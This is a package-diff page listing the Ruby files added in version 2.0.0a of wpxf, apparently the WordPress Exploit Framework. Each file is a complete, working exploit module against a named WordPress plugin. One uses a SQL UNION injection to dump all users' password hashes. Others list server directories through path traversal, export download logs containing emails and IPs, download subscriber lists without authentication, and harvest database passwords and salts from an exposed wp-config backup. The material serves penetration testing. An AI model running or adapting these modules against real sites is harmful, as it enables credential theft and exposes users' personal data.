RubyGems - wpxf - Versions diffs - 2.0.0a - Mend

wpxf 2.0.0a

Files changed (455) hide show

data/lib/wpxf/modules/auxiliary/hash_dump/ultimate_product_catalogue_hash_dump.rb ADDED

@@ -0,0 +1,60 @@
+# frozen_string_literal: true
+class Wpxf::Auxiliary::UltimateProductCatalogueHashDump < Wpxf::Module
+  include Wpxf::WordPress::HashDump
+  def initialize
+    super
+    update_info(
+      name: 'Ultimate Product Catalogue <= 4.2.2 Authenticated Hash Dump',
+      desc: %(
+        Ultimate Product Catalogue <= 4.2.2 contains an SQL injection vulnerability
+        which can be leveraged by all users with at least subscriber status. This
+        module utilises this vulnerability to dump the hashed passwords of all
+        users in the database.
+      ),
+      author: [
+        'Lenon Leite', # Disclosure
+        'rastating'    # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8853'],
+        ['URL', 'http://lenonleite.com.br/en/blog/2017/05/31/english-ultimate-product-catalogue-4-2-2-sql-injection/']
+      ],
+      date: 'Jun 26 2017'
+    )
+  end
+  def check
+    check_plugin_version_from_changelog('ultimate-product-catalogue', 'readme.txt', '4.2.3')
+  end
+  def requires_authentication
+    true
+  end
+  def hashdump_request_method
+    :post
+  end
+  def hashdump_request_params
+    { 'action' => 'get_upcp_subcategories' }
+  end
+  def hashdump_request_body
+    { 'CatID' => "0 UNION #{hashdump_sql_statement}" }
+  end
+  def hashdump_visible_field_index
+    0
+  end
+  def hashdump_number_of_cols
+    2
+  end
+  def vulnerable_url
+    wordpress_url_admin_ajax
+  end
+end

data/lib/wpxf/modules/auxiliary/info/download_manager_directory_listing_disclosure.rb ADDED

@@ -0,0 +1,106 @@
+# frozen_string_literal: true
+require 'erb'
+require 'nokogiri'
+class Wpxf::Auxiliary::DownloadManagerDirectoryListingDisclosure < Wpxf::Module
+  include Wpxf
+  include ERB::Util
+  def initialize
+    super
+    update_info(
+      name: 'Download Manager Directory Listing Disclosure',
+      desc: %(
+        This module uses a lack of session and input validation in
+        versions < 2.8.3 of the Download Manager plugin to get
+        the directory listing of the specified directory.
+      ),
+      author: [
+        'James Golovich', # Disclosure
+        'rastating'       # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8365'],
+        ['URL', 'http://www.pritect.net/blog/wordpress-download-manager-2-8-8-critical-security-vulnerabilities']
+      ],
+      date: 'Jan 19 2016'
+    )
+    register_options([
+      StringOption.new(
+        name: 'remote_path',
+        desc: 'The relative or absolute path to view the contents of',
+        required: true,
+        default: '../'
+      )
+    ])
+  end
+  def check
+    check_plugin_version_from_readme('download-manager', '2.8.3')
+  end
+  def remote_path
+    if datastore['remote_path'].end_with? '/'
+      datastore['remote_path']
+    else
+      "#{datastore['remote_path']}/"
+    end
+  end
+  def encoded_remote_path
+    url_encode(remote_path)
+  end
+  def run
+    return false unless super
+    listing = [{
+      name: 'Name', type: 'Type'
+    }]
+    emit_info 'Requesting directory listing...'
+    res = execute_post_request(
+      url: wordpress_url_admin_ajax,
+      params: {
+        'action' => 'wpdm_init',
+        'task' => 'wpdm_dir_tree'
+      },
+      body: {
+        'dir' => encoded_remote_path
+      }
+    )
+    if res.nil?
+      emit_error 'No response from the target'
+      return false
+    end
+    if res.code != 200
+      emit_error "Server responded with code #{res.code}"
+      return false
+    end
+    emit_info 'Parsing response...'
+    begin
+      doc = Nokogiri::HTML(res.body)
+      items = doc.xpath("//ul//li")
+      items.each do |item|
+        if item['class'] =~ /directory/
+          listing.push(name: item.at('a').text, type: 'Directory')
+        else
+          listing.push(name: item.at('a').text, type: 'File')
+        end
+      end
+    rescue StandardError => e
+      emit_error "Could not parse the response: #{e}"
+      return false
+    end
+    emit_table listing
+    true
+  end
+end

data/lib/wpxf/modules/auxiliary/info/download_monitor_log_export.rb ADDED

@@ -0,0 +1,111 @@
+# frozen_string_literal: true
+require 'csv'
+class Wpxf::Auxiliary::DownloadMonitorLogExport < Wpxf::Module
+  include Wpxf
+  include Wpxf::Helpers::Export
+  def initialize
+    super
+    update_info(
+      name: 'Download Monitor <= 1.9.6 Log Export',
+      desc: %(
+        This module allows a user of any level to export a CSV of the download logs, which
+        includes: Download ID, Version ID, Filename, User ID, User Login, User Email, User IP, User Agent, Date, Status
+      ),
+      author: [
+        'James Golovich', # Disclosure
+        'rastating'       # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8810']
+      ],
+      date: 'May 05 2017'
+    )
+  end
+  def check
+    check_plugin_version_from_readme('download-monitor', '1.9.7')
+  end
+  def requires_authentication
+    true
+  end
+  def process_row(row)
+    return unless row[:user_login] && row[:user_email]
+    emit_success "Found user: #{row[:user_login]} (#{row[:user_email]})", true
+    @users.push(id: row[:user_login], email: row[:user_email], ip: row[:user_ip])
+  end
+  def parse_csv(body, delimiter)
+    begin
+      CSV::Converters[:blank_to_nil] = lambda do |field|
+        field && field.empty? ? nil : field
+      end
+      csv = CSV.new(
+        body,
+        col_sep: delimiter,
+        headers: true,
+        header_converters: :symbol,
+        converters: %i[all blank_to_nil]
+      )
+      csv.to_a.map { |row| process_row(row) }
+      return true
+    rescue StandardError
+      return false
+    end
+  end
+  def execute_download_log_export
+    res = execute_get_request(
+      url: wordpress_url_admin,
+      params: { 'dlm_download_logs' => 'true' },
+      cookie: session_cookie
+    )
+    if res.nil?
+      emit_error 'No response from the target'
+      return false
+    end
+    if res.code != 200
+      emit_error "Server responded with code #{res.code}"
+      return false
+    end
+    res
+  end
+  def parse_and_display(content)
+    @users = [{
+      id: 'Username', email: 'E-mail', ip: 'IP Address'
+    }]
+    unless parse_csv(content, ',') || parse_csv(content, ';')
+      emit_error 'Failed to parse response, the CSV was invalid'
+      emit_info "CSV content: #{content}", true
+      return false
+    end
+    emit_table @users
+  end
+  def run
+    return false unless super
+    emit_info 'Requesting download logs...'
+    res = execute_download_log_export
+    emit_info 'Parsing response...'
+    parse_and_display(res.body)
+    loot = export_and_log_loot(res.body, 'Download logs export', 'log', '.csv')
+    emit_success "Download log saved to #{loot.path}"
+    true
+  end
+end

data/lib/wpxf/modules/auxiliary/info/email_subscribers_user_list_disclosure.rb ADDED

@@ -0,0 +1,103 @@
+# frozen_string_literal: true
+require 'wpxf/helpers/export'
+class Wpxf::Auxiliary::EmailSubscribersUserListDisclosure < Wpxf::Module
+  include Wpxf
+  include Wpxf::Helpers::Export
+  def initialize
+    super
+    update_info(
+      name: 'Email Subscribers & Newsletters <= 3.4.7 User List Disclosure',
+      desc: %(
+        This module exploits a vulnerability in Email Subscribers & Newsletters
+        which allows anonymous users to download a list of the registered users
+        and the associated e-mail addresses.
+      ),
+      author: [
+        'Threat Press', # Disclosure
+        'rastating'     # WPXF module
+      ],
+      references: [
+        ['WPVDB', '9014'],
+        ['CVE', '2018-6015'],
+        ['URL', 'https://blog.threatpress.com/vulnerability-email-subscribers-plugin/']
+      ],
+      date: 'Jan 24 2018'
+    )
+  end
+  def check
+    check_plugin_version_from_readme('email-subscribers', '3.4.8')
+  end
+  def request_user_list
+    res = execute_post_request(
+      url: full_uri,
+      params: { 'es' => 'export' },
+      body: { 'option' => 'registered_user' }
+    )
+    if res.nil?
+      emit_error 'No response from the target'
+      return nil
+    end
+    if res.code != 200
+      emit_error "Server responded with code #{res.code}"
+      return nil
+    end
+    res
+  end
+  def process_row(row)
+    return unless row[:name] && row[:email]
+    emit_success "Found user: #{row[:name]} (#{row[:email]})", true
+    store_credentials row[:name]
+    @users.push(username: row[:name], email: row[:email])
+  end
+  def parse_csv(body, delimiter)
+    @users = [{
+      username: 'Username', email: 'E-mail'
+    }]
+    begin
+      CSV::Converters[:blank_to_nil] = lambda do |field|
+        field&.empty? ? nil : field
+      end
+      csv = CSV.new(
+        body,
+        col_sep: delimiter,
+        headers: true,
+        header_converters: :symbol,
+        converters: %i[all blank_to_nil]
+      )
+      csv.to_a.map { |row| process_row(row) }
+      emit_table @users
+      return true
+    rescue Error
+      return false
+    end
+  end
+  def run
+    return false unless super
+    emit_info 'Requesting the user list...'
+    res = request_user_list
+    return false if res.nil?
+    emit_info 'Parsing result...', true
+    parse_csv res.body, ','
+    loot = export_and_log_loot(res.body, 'Registered users and e-mail addresses', 'user list', '.csv')
+    emit_success "User list saved to #{loot.path}"
+    true
+  end
+end

data/lib/wpxf/modules/auxiliary/info/file_manager_database_credentials.rb ADDED

@@ -0,0 +1,86 @@
+# frozen_string_literal: true
+class Wpxf::Auxiliary::FileManagerDatabaseCredentialsDisclosure < Wpxf::Module
+  include Wpxf
+  def initialize
+    super
+    update_info(
+      name: 'File Manager <= 5.0.1 Database Credentials Disclosure',
+      desc: %(
+        Prior to version 5.0.2 of the File Manager plugin, any changes
+        made to the wp-config.php file via the plugin would result
+        in a backup being stored in a publicly accessible plain text
+        file. This module will download and parse the file to harvest
+        the database credentials and salts.
+      ),
+      author: [
+        'Colette Chamberland', # Disclosure
+        'rastating'            # WPXF module
+      ],
+      references: [
+        ['CVE', '2018-7204'],
+        ['WPVDB', '9036']
+      ],
+      date: 'Mar 02 2018'
+    )
+  end
+  def check
+    check_plugin_version_from_changelog('file-manager', 'readme.txt', '5.0.2')
+  end
+  def log_url
+    normalize_uri(wordpress_url_uploads, 'file-manager', 'log.txt')
+  end
+  def parse_log(log)
+    loot = [{ key: 'Key', value: 'Value' }]
+    wanted_keys = [
+      'DB_NAME',
+      'DB_USER',
+      'DB_PASSWORD',
+      'DB_HOST',
+      'AUTH_KEY',
+      'SECURE_AUTH_KEY',
+      'LOGGED_IN_KEY',
+      'NONCE_KEY',
+      'AUTH_SALT',
+      'SECURE_AUTH_SALT',
+      'LOGGED_IN_SALT',
+      'NONCE_SALT'
+    ]
+    matches = log.scan(/define\(\\'.+?',\s+?\\'.+?'\);/i)
+    matches.each do |match|
+      kvp = match.match(/define\(\\'(.+?)\\',\s+?\\'(.+?)\\'\);/i)&.captures
+      next if kvp.nil?
+      loot.push(key: kvp[0], value: kvp[1]) if wanted_keys.include? kvp[0]
+    end
+    loot
+  end
+  def run
+    return false unless super
+    emit_info 'Downloading log...'
+    res = execute_get_request(url: log_url)
+    if res&.code != 200
+      emit_error 'Failed to download log'
+      return false
+    end
+    emit_info 'Parsing log...'
+    loot = parse_log(res.body)
+    if loot.length == 1
+      emit_error 'Could not find wp-config.php within the log'
+      return false
+    end
+    emit_table loot
+    true
+  end
+end